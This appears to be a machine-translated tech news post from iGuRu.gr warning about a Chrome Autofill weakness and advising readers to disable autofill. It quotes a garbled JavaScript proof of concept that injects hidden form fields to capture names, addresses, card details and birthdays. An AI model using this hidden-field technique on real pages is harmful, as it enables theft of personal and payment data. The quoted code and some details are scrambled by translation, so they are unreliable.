Autofill: why should you disable it immediately


Google Chrome has not yet fixed a known vulnerability in Autofill (autofill) published for 2013 for the first time.

With this vulnerability, a hacker can hide the fields of a login form on a web page, and Chrome will fill in his or her own personal information if you choose to use AutoFill or Autofill.

The following gif describes the problem:

Autofill

The hampie user of GitHub presented it with the following JavaScript:

var-autocompletes = ['name', 'honorific-prefix', 'given-name', 'additionalname', 'familyname', 'honorific-suffix', 'nickname' ',' address-line1 ',' address-level2 ',' address-level3 ',' address-line4 ',' 'cc-name', 'cc-given-name', 'cc-additional', 'address-level3', 'address-level2', ' name, cc-exp-year, cc-exp-year, cc-csc, cc-type, transaction-currency 'bday', 'bday-day', 'bday-year', 'sex', 'url', 'photo', 'tel' 'tel-country-code', 'tel-national', 'tel-area-code', 'tel-local', 'tel-local-prefix' 'impp']; e-mailField.addEventListener ('focus', function () {var wrap = autocompletes.reduce (function (wrapper, field) {var input = document.createElement ('input'); // make them not focussable input.tabIndex = -1 ;); document.createElement ('div'); // Hide the wrapper wrap.classList.add ('hidden'); form.appendChild (wrap) ); // Inject the autocompletes once this.removeEventListener ('focus', arguments.callee);});

Of course, we recommend turning off Chrome's auto-fill feature immediately.
Let's also look at the fastest way to disable autocomplete on Chrome:

Open the address:

chrome://settings/autofill

and disable the function:

That's it. You are safe from this exploit.

Registration in iGuRu.gr via Email

Enter your email to subscribe to the email notification service for new posts.


Read them Technology News from all over the world, with the validity of iGuRu.gr

Follow us on Google News iGuRu.gr at Google news